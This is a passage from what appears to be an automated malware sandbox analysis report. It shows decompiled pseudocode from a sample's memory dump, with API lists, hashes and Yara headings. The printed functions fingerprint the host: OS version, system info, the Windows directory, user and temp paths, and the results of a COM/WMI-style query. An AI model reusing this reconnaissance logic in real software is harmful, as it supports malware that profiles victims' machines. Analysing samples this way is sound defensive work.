					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E00AF95C2(_t199, 0x10c);
				_t200 =  *0xb0e684; // 0x4d3f6c8
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0xb0e684; // 0x4d3f6c8
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E00AF85B6( &_v8);
				_t124 =  *0xb0e684; // 0x4d3f6c8
				_t61 = _t222 + 0x1434; // 0x1434
                                                                                                                                                                                                				_t219 = _t61;
                                                                                                                                                                                                				 *_t224 = 0x209;
                                                                                                                                                                                                				_push(_t219);
                                                                                                                                                                                                				_push(L"USERPROFILE");
                                                                                                                                                                                                				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
                                                                                                                                                                                                					E00AF9621(_t219, 0x105, L"%s\\%s", _t168);
                                                                                                                                                                                                					_t152 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                					_t224 =  &(_t224[5]);
                                                                                                                                                                                                					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_push(0x20a);
                                                                                                                                                                                                				_t64 = _t222 + 0x122a; // 0x122a
                                                                                                                                                                                                				_t169 = L"TEMP";
                                                                                                                                                                                                				_t127 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                				_push(_t169);
                                                                                                                                                                                                				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
                                                                                                                                                                                                					_t149 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_push(0x40);
                                                                                                                                                                                                				_t220 = L"SystemDrive";
                                                                                                                                                                                                				_push( &_v180);
                                                                                                                                                                                                				_t130 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                				_push(_t220);
                                                                                                                                                                                                				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
                                                                                                                                                                                                					_t147 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_v8 = 0x7f;
                                                                                                                                                                                                				_t72 = _t222 + 0x199c; // 0x199c
                                                                                                                                                                                                				_t134 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
                                                                                                                                                                                                				_t75 = _t222 + 0x100c; // 0x100c
                                                                                                                                                                                                				E00B02339(E00AFD442(_t75, E00AFC3BB(_t75), 0),  &_v2680);
                                                                                                                                                                                                				_t76 = _t222 + 0x1858; // 0x1858
                                                                                                                                                                                                				E00B0230B( &_v2680, _t76, 0x20);
                                                                                                                                                                                                				_t79 = _t222 + 0x1878; // 0x1878
                                                                                                                                                                                                				E00AF900E(1, _t79, 0x14, 0x1e,  &_v2680);
                                                                                                                                                                                                				 *((intOrPtr*)(_t222 + 0x1898)) = E00AFCD75(_t79);
                                                                                                                                                                                                				return _t222;
                                                                                                                                                                                                			}



















































                                                                                                                                                                                                0x00afd304
                                                                                                                                                                                                0x00afd304
                                                                                                                                                                                                0x00afd30e
                                                                                                                                                                                                0x00afd313
                                                                                                                                                                                                0x00afd318
                                                                                                                                                                                                0x00afd318
                                                                                                                                                                                                0x00afd31e
                                                                                                                                                                                                0x00afd325
                                                                                                                                                                                                0x00afd326
                                                                                                                                                                                                0x00afd333
                                                                                                                                                                                                0x00afd346
                                                                                                                                                                                                0x00afd34b
                                                                                                                                                                                                0x00afd350
                                                                                                                                                                                                0x00afd359
                                                                                                                                                                                                0x00afd359
                                                                                                                                                                                                0x00afd35f
                                                                                                                                                                                                0x00afd364
                                                                                                                                                                                                0x00afd36a
                                                                                                                                                                                                0x00afd370
                                                                                                                                                                                                0x00afd375
                                                                                                                                                                                                0x00afd37e
                                                                                                                                                                                                0x00afd380
                                                                                                                                                                                                0x00afd387
                                                                                                                                                                                                0x00afd387
                                                                                                                                                                                                0x00afd38d
                                                                                                                                                                                                0x00afd395
                                                                                                                                                                                                0x00afd39a
                                                                                                                                                                                                0x00afd39b
                                                                                                                                                                                                0x00afd3a0
                                                                                                                                                                                                0x00afd3a9
                                                                                                                                                                                                0x00afd3ab
                                                                                                                                                                                                0x00afd3b6
                                                                                                                                                                                                0x00afd3b6
                                                                                                                                                                                                0x00afd3bf
                                                                                                                                                                                                0x00afd3c7
                                                                                                                                                                                                0x00afd3ce
                                                                                                                                                                                                0x00afd3d3
                                                                                                                                                                                                0x00afd3e2
                                                                                                                                                                                                0x00afd3fa
                                                                                                                                                                                                0x00afd401
                                                                                                                                                                                                0x00afd40f
                                                                                                                                                                                                0x00afd421
                                                                                                                                                                                                0x00afd428
                                                                                                                                                                                                0x00afd435
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00AF85E5: RtlAllocateHeap.NTDLL(00000008,?,?,00AF8F65,00000100,?,00AF5FAC), ref: 00AF85F3
                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00AFD088
                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 00AFD0C4
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00AFD0E1
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00AFD180
                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 00AFD1AE
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00AFD1B4
                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 00AFD209
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00AFD250
                                                                                                                                                                                                • memset.MSVCRT ref: 00AFD26B
                                                                                                                                                                                                • GetVersionExA.KERNEL32(00000000), ref: 00AFD276
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000100), ref: 00AFD290
                                                                                                                                                                                                • GetSystemInfo.KERNEL32(?), ref: 00AFD2AC
                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 00AFD2C9
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
                                                                                                                                                                                                • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                                                                                                                                                                                • API String ID: 3876402152-2706916422
                                                                                                                                                                                                • Opcode ID: d79b34c582b1c4b5bff63d1fb6968623631b7f5361c35f3c805bb73b1d72adeb
                                                                                                                                                                                                • Instruction ID: 606e6abad7e46e924ce45711d10660a1ca5c41b23872990d99033a0d31f64e2f
                                                                                                                                                                                                • Opcode Fuzzy Hash: d79b34c582b1c4b5bff63d1fb6968623631b7f5361c35f3c805bb73b1d72adeb
                                                                                                                                                                                                • Instruction Fuzzy Hash: EDB14D71600709AFD710EBB4DD89FEA77E9EF18300F004969F65AD7291EF70AA448B61
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                                                                			E00AFDB7E(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                				signed int _v20;
                                                                                                                                                                                                				char _v24;
                                                                                                                                                                                                				void* _v28;
                                                                                                                                                                                                				signed int _v32;
                                                                                                                                                                                                				char _v36;
                                                                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                                                                				signed int _v44;
                                                                                                                                                                                                				char _v48;
                                                                                                                                                                                                				char _v52;
                                                                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                                                                				signed int _v60;
                                                                                                                                                                                                				char* _v72;
                                                                                                                                                                                                				signed short _v80;
                                                                                                                                                                                                				signed int _v84;
                                                                                                                                                                                                				char _v88;
                                                                                                                                                                                                				char _v92;
                                                                                                                                                                                                				char _v96;
                                                                                                                                                                                                				intOrPtr _v100;
                                                                                                                                                                                                				char _v104;
                                                                                                                                                                                                				char _v616;
                                                                                                                                                                                                				intOrPtr* _t159;
                                                                                                                                                                                                				char _t165;
                                                                                                                                                                                                				signed int _t166;
                                                                                                                                                                                                				signed int _t173;
                                                                                                                                                                                                				signed int _t178;
                                                                                                                                                                                                				signed int _t186;
                                                                                                                                                                                                				intOrPtr* _t187;
                                                                                                                                                                                                				signed int _t188;
                                                                                                                                                                                                				signed int _t192;
                                                                                                                                                                                                				intOrPtr* _t193;
                                                                                                                                                                                                				intOrPtr _t200;
                                                                                                                                                                                                				intOrPtr* _t205;
                                                                                                                                                                                                				signed int _t207;
                                                                                                                                                                                                				signed int _t209;
                                                                                                                                                                                                				intOrPtr* _t210;
                                                                                                                                                                                                				intOrPtr _t212;
                                                                                                                                                                                                				intOrPtr* _t213;
                                                                                                                                                                                                				signed int _t214;
                                                                                                                                                                                                				char _t217;
                                                                                                                                                                                                				signed int _t218;
                                                                                                                                                                                                				signed int _t219;
                                                                                                                                                                                                				signed int _t230;
                                                                                                                                                                                                				signed int _t235;
                                                                                                                                                                                                				signed int _t242;
                                                                                                                                                                                                				signed int _t243;
                                                                                                                                                                                                				signed int _t244;
                                                                                                                                                                                                				signed int _t245;
                                                                                                                                                                                                				intOrPtr* _t247;
                                                                                                                                                                                                				intOrPtr* _t251;
                                                                                                                                                                                                				signed int _t252;
                                                                                                                                                                                                				intOrPtr* _t253;
                                                                                                                                                                                                				void* _t255;
                                                                                                                                                                                                				intOrPtr* _t261;
                                                                                                                                                                                                				signed int _t262;
                                                                                                                                                                                                				signed int _t283;
                                                                                                                                                                                                				signed int _t289;
                                                                                                                                                                                                				char* _t298;
                                                                                                                                                                                                				void* _t320;
                                                                                                                                                                                                				signed int _t322;
                                                                                                                                                                                                				intOrPtr* _t323;
                                                                                                                                                                                                				intOrPtr _t324;
                                                                                                                                                                                                				signed int _t327;
                                                                                                                                                                                                				intOrPtr* _t328;
                                                                                                                                                                                                				intOrPtr* _t329;
                                                                                                                                                                                                
                                                                                                                                                                                                				_v32 = _v32 & 0x00000000;
                                                                                                                                                                                                				_v60 = _v60 & 0x00000000;
                                                                                                                                                                                                				_v56 = __edx;
                                                                                                                                                                                                				_v100 = __ecx;
                                                                                                                                                                                                				_t159 = E00AFD565(__ecx);
                                                                                                                                                                                                				_t251 = _t159;
                                                                                                                                                                                                				_v104 = _t251;
                                                                                                                                                                                                				if(_t251 == 0) {
                                                                                                                                                                                                					return _t159;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t320 = E00AF85E5(0x10);
                                                                                                                                                                                                				_v36 = _t320;
                                                                                                                                                                                                				_pop(_t255);
                                                                                                                                                                                                				if(_t320 == 0) {
                                                                                                                                                                                                					L53:
                                                                                                                                                                                                					E00AF85FB( &_v60, 0xfffffffe);
                                                                                                                                                                                                					E00AFD619( &_v104);
                                                                                                                                                                                                					return _t320;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t165 = E00AF95C2(_t255, 0x536);
                                                                                                                                                                                                				 *_t328 = 0x609;
                                                                                                                                                                                                				_v52 = _t165;
                                                                                                                                                                                                				_t166 = E00AF95C2(_t255);
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_push(_v56);
                                                                                                                                                                                                				_v20 = _t166;
                                                                                                                                                                                                				_push(_t166);
                                                                                                                                                                                                				_push(_a4);
                                                                                                                                                                                                				_t322 = E00AF92C6(_t165);
                                                                                                                                                                                                				_v60 = _t322;
                                                                                                                                                                                                				E00AF85B6( &_v52);
                                                                                                                                                                                                				E00AF85B6( &_v20);
                                                                                                                                                                                                				_t329 = _t328 + 0x20;
                                                                                                                                                                                                				if(_t322 != 0) {
                                                                                                                                                                                                					_t323 = __imp__#2;
                                                                                                                                                                                                					_v40 =  *_t323(_t322);
                                                                                                                                                                                                					_t173 = E00AF95C2(_t255, 0x9e4);
                                                                                                                                                                                                					_v20 = _t173;
                                                                                                                                                                                                					_v52 =  *_t323(_t173);
                                                                                                                                                                                                					E00AF85B6( &_v20);
                                                                                                                                                                                                					_t324 = _v40;
                                                                                                                                                                                                					_t261 =  *_t251;
                                                                                                                                                                                                					_t252 = 0;
                                                                                                                                                                                                					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
                                                                                                                                                                                                					__eflags = _t178;
                                                                                                                                                                                                					if(_t178 != 0) {
                                                                                                                                                                                                						L52:
                                                                                                                                                                                                						__imp__#6(_t324);
                                                                                                                                                                                                						__imp__#6(_v52);
                                                                                                                                                                                                						goto L53;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t262 = _v32;
                                                                                                                                                                                                					_v28 = 0;
                                                                                                                                                                                                					_v20 = 0;
                                                                                                                                                                                                					__eflags = _t262;
                                                                                                                                                                                                					if(_t262 == 0) {
                                                                                                                                                                                                						L49:
                                                                                                                                                                                                						 *((intOrPtr*)( *_t262 + 8))(_t262);
                                                                                                                                                                                                						__eflags = _t252;
                                                                                                                                                                                                						if(_t252 == 0) {
                                                                                                                                                                                                							E00AF85FB( &_v36, 0);
                                                                                                                                                                                                							_t320 = _v36;
                                                                                                                                                                                                						} else {
                                                                                                                                                                                                							 *(_t320 + 8) = _t252;
                                                                                                                                                                                                							 *_t320 = E00AF91C4(_v100);
                                                                                                                                                                                                							 *((intOrPtr*)(_t320 + 4)) = E00AF91C4(_v56);
                                                                                                                                                                                                						}
                                                                                                                                                                                                						goto L52;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						goto L6;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                						L6:
                                                                                                                                                                                                						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
                                                                                                                                                                                                						__eflags = _t186;
                                                                                                                                                                                                						if(_t186 != 0) {
                                                                                                                                                                                                							break;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_v16 = 0;
                                                                                                                                                                                                						_v48 = 0;
                                                                                                                                                                                                						_v12 = 0;
                                                                                                                                                                                                						_v24 = 0;
                                                                                                                                                                                                						__eflags = _v84;
                                                                                                                                                                                                						if(_v84 == 0) {
                                                                                                                                                                                                							break;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t187 = _v28;
                                                                                                                                                                                                						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
                                                                                                                                                                                                						__eflags = _t188;
                                                                                                                                                                                                						if(_t188 >= 0) {
                                                                                                                                                                                                							__imp__#20(_v24, 1,  &_v16);
                                                                                                                                                                                                							__imp__#19(_v24, 1,  &_v48);
                                                                                                                                                                                                							_t46 = _t320 + 0xc; // 0xc
                                                                                                                                                                                                							_t253 = _t46;
                                                                                                                                                                                                							_t327 = _t252 << 3;
                                                                                                                                                                                                							_t47 = _t327 + 8; // 0x8
                                                                                                                                                                                                							_t192 = E00AF8679(_t327, _t47);
                                                                                                                                                                                                							__eflags = _t192;
                                                                                                                                                                                                							if(_t192 == 0) {
                                                                                                                                                                                                								__imp__#16(_v24);
                                                                                                                                                                                                								_t193 = _v28;
                                                                                                                                                                                                								 *((intOrPtr*)( *_t193 + 8))(_t193);
                                                                                                                                                                                                								L46:
                                                                                                                                                                                                								_t252 = _v20;
                                                                                                                                                                                                								break;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
                                                                                                                                                                                                							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E00AF85E5( *(_t327 +  *_t253) << 3);
                                                                                                                                                                                                							_t200 =  *_t253;
                                                                                                                                                                                                							__eflags =  *(_t327 + _t200 + 4);
                                                                                                                                                                                                							if( *(_t327 + _t200 + 4) == 0) {
                                                                                                                                                                                                								_t136 = _t320 + 0xc; // 0xc
                                                                                                                                                                                                								E00AF85FB(_t136, 0);
                                                                                                                                                                                                								E00AF85FB( &_v36, 0);
                                                                                                                                                                                                								__imp__#16(_v24);
                                                                                                                                                                                                								_t205 = _v28;
                                                                                                                                                                                                								 *((intOrPtr*)( *_t205 + 8))(_t205);
                                                                                                                                                                                                								_t320 = _v36;
                                                                                                                                                                                                								goto L46;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							_t207 = _v16;
                                                                                                                                                                                                							while(1) {
                                                                                                                                                                                                								_v12 = _t207;
                                                                                                                                                                                                								__eflags = _t207 - _v48;
                                                                                                                                                                                                								if(_t207 > _v48) {
                                                                                                                                                                                                									break;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								_v44 = _v44 & 0x00000000;
                                                                                                                                                                                                								_t209 =  &_v12;
                                                                                                                                                                                                								__imp__#25(_v24, _t209,  &_v44);
                                                                                                                                                                                                								__eflags = _t209;
                                                                                                                                                                                                								if(_t209 < 0) {
                                                                                                                                                                                                									break;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								_t212 = E00AF91C4(_v44);
                                                                                                                                                                                                								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                                                                                                                                                                                                								_t213 = _v28;
                                                                                                                                                                                                								_t281 =  *_t213;
                                                                                                                                                                                                								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                                                                                                                                                                                                								__eflags = _t214;
                                                                                                                                                                                                								if(_t214 < 0) {
                                                                                                                                                                                                									L39:
                                                                                                                                                                                                									__imp__#6(_v44);
                                                                                                                                                                                                									_t207 = _v12 + 1;
                                                                                                                                                                                                									__eflags = _t207;
                                                                                                                                                                                                									continue;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								_v92 = E00AF95C2(_t281, 0x250);
                                                                                                                                                                                                								 *_t329 = 0x4cc;
                                                                                                                                                                                                								_t217 = E00AF95C2(_t281);
                                                                                                                                                                                                								_t283 = _v80;
                                                                                                                                                                                                								_v96 = _t217;
                                                                                                                                                                                                								_t218 = _t283 & 0x0000ffff;
                                                                                                                                                                                                								__eflags = _t218 - 0xb;
                                                                                                                                                                                                								if(__eflags > 0) {
                                                                                                                                                                                                									_t219 = _t218 - 0x10;
                                                                                                                                                                                                									__eflags = _t219;
                                                                                                                                                                                                									if(_t219 == 0) {
                                                                                                                                                                                                										L35:
                                                                                                                                                                                                										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00AF85E5(0x18);
                                                                                                                                                                                                										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                                                                                                                                                										__eflags = _t289;
                                                                                                                                                                                                										if(_t289 == 0) {
                                                                                                                                                                                                											L38:
                                                                                                                                                                                                											E00AF85B6( &_v92);
                                                                                                                                                                                                											E00AF85B6( &_v96);
                                                                                                                                                                                                											__imp__#9( &_v80);
                                                                                                                                                                                                											goto L39;
                                                                                                                                                                                                										}
                                                                                                                                                                                                										_push(_v72);
                                                                                                                                                                                                										_push(L"%d");
                                                                                                                                                                                                										L37:
                                                                                                                                                                                                										_push(0xc);
                                                                                                                                                                                                										_push(_t289);
                                                                                                                                                                                                										E00AF9621();
                                                                                                                                                                                                										_t329 = _t329 + 0x10;
                                                                                                                                                                                                										goto L38;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									_t230 = _t219 - 1;
                                                                                                                                                                                                									__eflags = _t230;
                                                                                                                                                                                                									if(_t230 == 0) {
                                                                                                                                                                                                										L33:
                                                                                                                                                                                                										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00AF85E5(0x18);
                                                                                                                                                                                                										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                                                                                                                                                										__eflags = _t289;
                                                                                                                                                                                                										if(_t289 == 0) {
                                                                                                                                                                                                											goto L38;
                                                                                                                                                                                                										}
                                                                                                                                                                                                										_push(_v72);
                                                                                                                                                                                                										_push(L"%u");
                                                                                                                                                                                                										goto L37;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									_t235 = _t230 - 1;
                                                                                                                                                                                                									__eflags = _t235;
                                                                                                                                                                                                									if(_t235 == 0) {
                                                                                                                                                                                                										goto L33;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									__eflags = _t235 == 1;
                                                                                                                                                                                                									if(_t235 == 1) {
                                                                                                                                                                                                										goto L33;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									L28:
                                                                                                                                                                                                									__eflags = _t283 & 0x00002000;
                                                                                                                                                                                                									if((_t283 & 0x00002000) == 0) {
                                                                                                                                                                                                										_v88 = E00AF95C2(_t283, 0x219);
                                                                                                                                                                                                										E00AF9621( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                                                                                                                                                                                                										E00AF85B6( &_v88);
                                                                                                                                                                                                										_t329 = _t329 + 0x18;
                                                                                                                                                                                                										_t298 =  &_v616;
                                                                                                                                                                                                										L31:
                                                                                                                                                                                                										_t242 = E00AF91C4(_t298);
                                                                                                                                                                                                										L32:
                                                                                                                                                                                                										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                                                                                                                                                                                                										goto L38;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									_t242 = E00AFDA62( &_v80);
                                                                                                                                                                                                									goto L32;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								if(__eflags == 0) {
                                                                                                                                                                                                									__eflags = _v72 - 0xffff;
                                                                                                                                                                                                									_t298 = L"TRUE";
                                                                                                                                                                                                									if(_v72 != 0xffff) {
                                                                                                                                                                                                										_t298 = L"FALSE";
                                                                                                                                                                                                									}
                                                                                                                                                                                                									goto L31;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								_t243 = _t218 - 1;
                                                                                                                                                                                                								__eflags = _t243;
                                                                                                                                                                                                								if(_t243 == 0) {
                                                                                                                                                                                                									goto L38;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								_t244 = _t243 - 1;
                                                                                                                                                                                                								__eflags = _t244;
                                                                                                                                                                                                								if(_t244 == 0) {
                                                                                                                                                                                                									goto L35;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								_t245 = _t244 - 1;
                                                                                                                                                                                                								__eflags = _t245;
                                                                                                                                                                                                								if(_t245 == 0) {
                                                                                                                                                                                                									goto L35;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								__eflags = _t245 != 5;
                                                                                                                                                                                                								if(_t245 != 5) {
                                                                                                                                                                                                									goto L28;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								_t298 = _v72;
                                                                                                                                                                                                								goto L31;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							__imp__#16(_v24);
                                                                                                                                                                                                							_t210 = _v28;
                                                                                                                                                                                                							 *((intOrPtr*)( *_t210 + 8))(_t210);
                                                                                                                                                                                                							_t252 = _v20;
                                                                                                                                                                                                							L42:
                                                                                                                                                                                                							_t262 = _v32;
                                                                                                                                                                                                							_t252 = _t252 + 1;
                                                                                                                                                                                                							_v20 = _t252;
                                                                                                                                                                                                							__eflags = _t262;
                                                                                                                                                                                                							if(_t262 != 0) {
                                                                                                                                                                                                								continue;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							L48:
                                                                                                                                                                                                							_t324 = _v40;
                                                                                                                                                                                                							goto L49;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t247 = _v28;
                                                                                                                                                                                                						 *((intOrPtr*)( *_t247 + 8))(_t247);
                                                                                                                                                                                                						goto L42;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t262 = _v32;
                                                                                                                                                                                                					goto L48;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					E00AF85FB( &_v36, _t322);
                                                                                                                                                                                                					_t320 = _v36;
                                                                                                                                                                                                					goto L53;
                                                                                                                                                                                                				}
                                                                                                                                                                                                			}
                                                                                                                                                                                                0x00afdbe4
                                                                                                                                                                                                0x00afdbe5
                                                                                                                                                                                                0x00afdbee
                                                                                                                                                                                                0x00afdbf4
                                                                                                                                                                                                0x00afdbf7
                                                                                                                                                                                                0x00afdc00
                                                                                                                                                                                                0x00afdc05
                                                                                                                                                                                                0x00afdc0a
                                                                                                                                                                                                0x00afdc21
                                                                                                                                                                                                0x00afdc2e
                                                                                                                                                                                                0x00afdc31
                                                                                                                                                                                                0x00afdc38
                                                                                                                                                                                                0x00afdc3d
                                                                                                                                                                                                0x00afdc44
                                                                                                                                                                                                0x00afdc49
                                                                                                                                                                                                0x00afdc50
                                                                                                                                                                                                0x00afdc52
                                                                                                                                                                                                0x00afdc5e
                                                                                                                                                                                                0x00afdc61
                                                                                                                                                                                                0x00afdc63
                                                                                                                                                                                                0x00afdfc3
                                                                                                                                                                                                0x00afdfc4
                                                                                                                                                                                                0x00afdfcd
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afdfcd
                                                                                                                                                                                                0x00afdc69
                                                                                                                                                                                                0x00afdc6c
                                                                                                                                                                                                0x00afdc6f
                                                                                                                                                                                                0x00afdc72
                                                                                                                                                                                                0x00afdc74
                                                                                                                                                                                                0x00afdf8f
                                                                                                                                                                                                0x00afdf92
                                                                                                                                                                                                0x00afdf95
                                                                                                                                                                                                0x00afdf97
                                                                                                                                                                                                0x00afdfb9
                                                                                                                                                                                                0x00afdfbe
                                                                                                                                                                                                0x00afdf99
                                                                                                                                                                                                0x00afdf9c
                                                                                                                                                                                                0x00afdfa7
                                                                                                                                                                                                0x00afdfae
                                                                                                                                                                                                0x00afdfae
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afdc7a
                                                                                                                                                                                                0x00afdc7a
                                                                                                                                                                                                0x00afdc8c
                                                                                                                                                                                                0x00afdc8f
                                                                                                                                                                                                0x00afdc91
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afdc99
                                                                                                                                                                                                0x00afdc9c
                                                                                                                                                                                                0x00afdc9f
                                                                                                                                                                                                0x00afdca2
                                                                                                                                                                                                0x00afdca5
                                                                                                                                                                                                0x00afdca8
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afdcae
                                                                                                                                                                                                0x00afdcbc
                                                                                                                                                                                                0x00afdcbf
                                                                                                                                                                                                0x00afdcc1
                                                                                                                                                                                                0x00afdcda
                                                                                                                                                                                                0x00afdce9
                                                                                                                                                                                                0x00afdcf1
                                                                                                                                                                                                0x00afdcf1
                                                                                                                                                                                                0x00afdcf4
                                                                                                                                                                                                0x00afdcfb
                                                                                                                                                                                                0x00afdcff
                                                                                                                                                                                                0x00afdd05
                                                                                                                                                                                                0x00afdd07
                                                                                                                                                                                                0x00afdf77
                                                                                                                                                                                                0x00afdf7d
                                                                                                                                                                                                0x00afdf83
                                                                                                                                                                                                0x00afdf86
                                                                                                                                                                                                0x00afdf86
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afdf86
                                                                                                                                                                                                0x00afdd16
                                                                                                                                                                                                0x00afdd2a
                                                                                                                                                                                                0x00afdd2e
                                                                                                                                                                                                0x00afdd30
                                                                                                                                                                                                0x00afdd35
                                                                                                                                                                                                0x00afdf44
                                                                                                                                                                                                0x00afdf4a
                                                                                                                                                                                                0x00afdf55
                                                                                                                                                                                                0x00afdf60
                                                                                                                                                                                                0x00afdf66
                                                                                                                                                                                                0x00afdf6c
                                                                                                                                                                                                0x00afdf6f
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afdf6f
                                                                                                                                                                                                0x00afdd3b
                                                                                                                                                                                                0x00afdf12
                                                                                                                                                                                                0x00afdf12
                                                                                                                                                                                                0x00afdf15
                                                                                                                                                                                                0x00afdf18
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afdd43
                                                                                                                                                                                                0x00afdd4b
                                                                                                                                                                                                0x00afdd52
                                                                                                                                                                                                0x00afdd58
                                                                                                                                                                                                0x00afdd5a
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afdd63
                                                                                                                                                                                                0x00afdd78
                                                                                                                                                                                                0x00afdd7e
                                                                                                                                                                                                0x00afdd87
                                                                                                                                                                                                0x00afdd8a
                                                                                                                                                                                                0x00afdd8d
                                                                                                                                                                                                0x00afdd8f
                                                                                                                                                                                                0x00afdf05
                                                                                                                                                                                                0x00afdf08
                                                                                                                                                                                                0x00afdf11
                                                                                                                                                                                                0x00afdf11
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afdf11
                                                                                                                                                                                                0x00afdd9f
